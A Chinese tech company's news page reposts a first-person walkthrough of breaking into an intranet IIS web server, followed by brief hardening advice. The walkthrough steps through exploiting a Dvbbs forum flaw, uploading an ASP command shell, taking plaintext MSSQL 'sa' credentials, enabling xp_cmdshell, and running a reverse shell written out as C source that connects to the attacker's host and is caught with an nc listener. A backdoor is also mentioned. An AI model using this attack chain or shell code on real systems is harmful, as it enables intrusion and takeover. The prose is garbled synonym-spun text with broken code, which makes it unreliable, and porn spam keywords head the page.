无码色色,久久久久久免费精品喷水,美女把胸罩解开让男生摸,欧美一级在线观看视频,色亚洲天堂,色综合天天综合给合国产

咨詢電話:023-88959644    24小時(shí)服務(wù)熱線:400-023-8809
NEWS CENTER ·
新聞動態(tài)
關(guān)注中技互聯(lián) 關(guān)注前沿

內(nèi)網(wǎng)Web服務(wù)器的安全問題如何組建

發(fā)表日期:2014-09-30    文章編輯:    瀏覽次數(shù):89    標(biāo)簽:

 許多公司或公司將其Web效勞器放在內(nèi)網(wǎng),并在防火墻上做映射,將來自80端口的懇求轉(zhuǎn)向一臺內(nèi)網(wǎng)Web效勞器的Web端口。



  這樣做安全性是提高了不少,但并不代表將Web效勞器躲藏在內(nèi)網(wǎng)就必定安全了,由于Web效勞器自身仍是存在許多疑問的,特別是一些CG,程序,通常這是大家最簡單忽略的當(dāng)?shù)亍O旅婢鸵砸慌_敞開80端口的Web效勞器為例,來測驗(yàn)其存在的安全隱患疑問,并且對存在疑問做測驗(yàn)描繪,指出疑問的癥結(jié)所在并給出防備錯施。



  這是某大學(xué)的文娛休閑網(wǎng)站,進(jìn)入看了看,頁面做得不錯,先看一看是什么Web效勞器吧。



  D:\ne -vv www.target.com 80



  DNS fwd/rev mismatch:www.target.com!=traget



  www.target.com[192.168.0.1]80(http)open



  GEP/HTTP/1.0



  HOST:www.target.com



  HTTP/1.1 200 OK



  Server:Microsoft-IIS/5.0



  Content-location:http://www.target.com/index.asp



  Date:Thu,22 May 2003 12:13:32 GMT



  Content-Type:text/html



  ......



  是IIS5.0,看看能不能直接溢出。用最新的IIS的WebDav溢出試試。個(gè)人感覺isno寫的那個(gè)溢出對比好用,但由于它是在內(nèi)網(wǎng),這個(gè)東西致使溢出后會直接在7788端口綁定一個(gè)cmd,這對咱們的這次侵略來說肯定是不可的。所以,我將它修改了一下,使它能夠反向銜接,但終究仍是不可,看來對方是打了補(bǔ)丁的。



  又逛了一下其他版面,看到有個(gè)BBS,是動網(wǎng)的論壇并且版別還對比低(5.00320)。不錯,這通常是咱們的突破口(榜首大失利)。很早曾經(jīng)我和我的好友pskey曾發(fā)現(xiàn)一個(gè)它的cookie變量未過濾縫隙,他還寫了一個(gè)Exploit(程序放在光盤中)。經(jīng)過這個(gè)縫隙,我能夠隨意更改恣意用戶(包含總版主)的用戶暗碼。我用這個(gè)ID進(jìn)入,進(jìn)到后臺辦理,修改設(shè)置,答應(yīng)上載exe、asp等文件。再看看有沒有禁用FSO,成果沒有禁用(第二大失利)。我經(jīng)過它上載了一個(gè)aspcmdshell。這個(gè)aspcmdshell能夠使我以guests組權(quán)限的用戶在Web效勞器上履行指令,當(dāng)然,前題是它沒有扔掉guests組對%systemroot%\winnt\cdm.exe的拜訪履行權(quán)限。試試"dir c:\"看看,公然沒有制止運(yùn)轉(zhuǎn)(第三大失利)。其實(shí),假如它制止了cmd.exe的運(yùn)轉(zhuǎn)權(quán)限也不要緊的,咱們能夠自已上載一個(gè)上去,再改一下這個(gè)aspcmdshell就能夠了。有了這個(gè)aspcmdshell,咱們能夠做許多工作。當(dāng)然這還不夠,我的意圖是拿到最高權(quán)限。此刻我就預(yù)備提高權(quán)限了。先看一看辦理員給了guests組哪些權(quán)限,看一下ipconfig的回來成果:



  Windows 2000 IP Configuration



  Ethernet adapter本地銜接:



  Connection-specific DNS Suffix.:



  IP Address.................: 192.168.1.222



  Subnet Mask................: 255.255.255.0



  Default Gateway............: 192.168.1.1



  喲,在內(nèi)網(wǎng),不錯,再試試C:\可不可寫,答案是不可寫(不錯)。再試試其他目錄,整個(gè)C.盤都不可寫,只給了Web目錄的可寫權(quán)限。再看一看跑了哪些效勞,用netstat -an指令來檢查一下。



  TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING喲!還跑了MSSQL的,不錯。這時(shí)分榜首個(gè)想做的即是看看哪些程序運(yùn)用了MSSQL數(shù)據(jù)庫。再到主頁上逛逛,看到有一個(gè)新聞體系,很有能夠即是它。用剛才那個(gè)aspcmdshell去檢查一下這個(gè)news/目錄里邊的ASP程序,看到許多文件榜首行都有,根本上這個(gè)即是數(shù)據(jù)庫的銜接程序了。檢查一下:



  strconn="Driver={SQL erver};Ddescription=sqldemo;



  SERVER=127.0.0.1;UID=sa;&



  PWD=hello;DATABASE=news



  set conn=server.createobject("adodb.connection")



  conn.open strconn



  公然不出我所料(第四大失利,將MSSQL的用戶名和暗碼以明文方式存放在ASP文件里),拿到了MSSQL數(shù)據(jù)庫的暗碼,并且仍是sa用戶的,權(quán)限對比大哦。本來想看看能不能查找一下新聞體系A(chǔ)SP程序的縫隙,運(yùn)用一下sql injection的??磥砣缃駨氐讻]有必要了。自個(gè)寫一個(gè)能夠用MSSQL拓展xp一cmdshell來履行體系指令的ASP程序,這里有能夠辦理員刪了這個(gè)拓展,或直接刪掉了xplog70.dll這個(gè)文件。不管它,先試試再說。寫sql.asp內(nèi)容如下:



  自個(gè)先開防火墻,記載icmp數(shù)據(jù)包,然后在IE里履行:



  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1



  這個(gè)ASP是經(jīng)過動網(wǎng)論壇自個(gè)的上載程序上載機(jī)程序設(shè)定把上載文件都上載到up1Oad土mageS/這個(gè)目錄里邊,根據(jù)當(dāng)時(shí)時(shí)間將文件重命名,所以文件名為439587438739·aSp這樣的全數(shù)字構(gòu)成。



  防火墻沒反響,暈!看來是刪了Xp--CmdSheI1這個(gè)拓展,或直接刪掉了Xp1Og70·d11這個(gè)文件。假如沒有直接刪掉Xp1Og70·d11,而僅僅刪了這個(gè)拓展的話,我來試一下恢復(fù)這個(gè)拓展。再寫個(gè)ASP:



  上載上去,再履行http://www.target.com/bbs/uploadimages/23456489432.asp.



  然后再提交懇求:



  http://www.target.com/bbs/uploadimages/



  439587438739.asp?cmd=ping%192.168.0.1



  呵呵,咱們的防火墻有反響了。來自www.target.com的icmp數(shù)據(jù)包被記載??磥頉]有疑問了,經(jīng)過這個(gè)ASP咱們能夠履行許多指令 (第五大失利),都是system權(quán)限,只不過沒有回顯,不是很完美。所以想得到一個(gè)交互式的she1l。寫個(gè)反連的程序吧:



  #include



  #include



  #pragma comment(lib."ws2_32")



  void main(int argc,char*argv[])



  {



  WSADATA wsaData;



  SOCKET hSocket;



  STARTUPINFO si;



  PROCESS_INFORMATION pi;



  struct sockaddr_in adik_sin;



  memset(&adik_sin,0,sizeof(adik_sin));



  memset(&si,0,sizeof(si));



  WSAStartuup(MAKEWORD(2,0),&WSAdATA);



  hSocket=WSASocket(AF_INET,



  SOCK_STREMA,NULL,NULL,NULL,NULL);



  adik_sin.sin_family=AF_INET;



  adik_sin.sin_port=htons(53);//銜接到我的主機(jī)53端口



  adik_sin.sin_addr.s_addr=inet_addr("192.



  168.0.1:);//我的主機(jī)的IP



  connect(hSocket.(struct sockaddr*)%adik_sin,



  sizeof(adik_sin);



  si.cb=sizeof(si)



  si.dwFlags-STARTF_USESTDHANDLES;



  si.hStdlnput=si.hStdOutput=si.hStdError



  =(void*)hSocket;



  CreateProcess(NULL."cmd.exe",NULL,



  NULL,1,NULL,NULL,NULL,&si.&pi);



  ExitProcess(0);



  }



  編譯成a.exe然后上載上去先在本機(jī)用nc監(jiān)聽一個(gè)端口53,然后在IE里履行:



  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe



  D:\nc-1 -p 53



  Microsoft Windows 2000[Version 5.00.2195]



  版權(quán)所有1985-2000Microsoft Corp:



  D:\inetpub\wwwroot\bbs\uploadimages>ipconfig



  windows 2000 IP Configuration



  Ethernet adapter本地銜接:



  Connection-specific DNS Suffix.:



  IP Address..............:192.168.1.222



  Subnet Mask.............:255.255.255.0



  Default Gateway.........:192.168.1.1



  D:\inetpub\wwwroot\bbs\uploadimages>



  好了,到此為止,侵略根本上完成了,如今咱們現(xiàn)已拿到了一個(gè)system權(quán)限的交互式shell,咱們能夠"隨心所欲"了。這個(gè)時(shí)分咱們能夠裝一個(gè)后門,使得咱們萄次進(jìn)來不必這么費(fèi)事,我曾經(jīng)寫了"一個(gè)US-BACKDOOR。使咱們能夠經(jīng)過80端口來"得到一個(gè)交互式的shell,且不影響,IIS程序自身的。正常運(yùn)轉(zhuǎn)。這個(gè)backdoor能夠在我的主頁上下載到?! ∩厦娴膸状笫Ю沟迷蹅兠勘芤徊饺饲侄既〉昧烁嗟臋?quán)限,其實(shí)一個(gè)優(yōu)異的辦理員徹底能夠防止這些。所以,一個(gè)小小的ASP程序過錯都能夠使你的效勞器被Cracker損壞。程序員們,該留意一下你們的程序了。對于前面我說到的幾大失利,我稍稍總緒一下辦理"根本應(yīng)當(dāng)做到的當(dāng)?shù)?



  (1)、不要運(yùn)用已知縫隙非常多的ASP程序,特別是像動網(wǎng)對比低的版別這類,即便運(yùn)用了,也要常常去官方論壇看看對比新的縫隙信息,及時(shí)打補(bǔ)丁或晉級程序。



  (2)、假如沒有必要用到FSO,能夠禁用。



  (3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests指令,制止掉GUESTS組用戶拜訪cmd.exe。



  (4)、盡量不要將數(shù)據(jù)庫的暗碼以明文的方式放在ASP程序里邊,能夠運(yùn)用數(shù)據(jù)源的方式來銜接數(shù)據(jù)庫。



  (5)、通常用戶應(yīng)當(dāng)用不到xp_crndshell這個(gè)拓展的,那么最佳刪掉xplog70.dll;盡量不要用sa這個(gè)用戶。將sa的暗碼設(shè)雜亂一些,能夠另建一個(gè)用戶,把權(quán)限調(diào)到最低。



  跋文



  文中所說到的被進(jìn)犯的網(wǎng)站主并非一臺露出在外面的裸機(jī),而是經(jīng)過防火墻映射的放置在內(nèi)網(wǎng)的效勞。

如沒特殊注明,文章均為中技互聯(lián)原創(chuàng),轉(zhuǎn)載請注明來自www.tmsmall666.cn
相關(guān)新聞

CopyrightZJCOO technology Co., LTD. All Rights Reserved.    

渝ICP 備11003429號

  • qq客服
  • 公眾號
  • 手機(jī)版
  • 新浪微博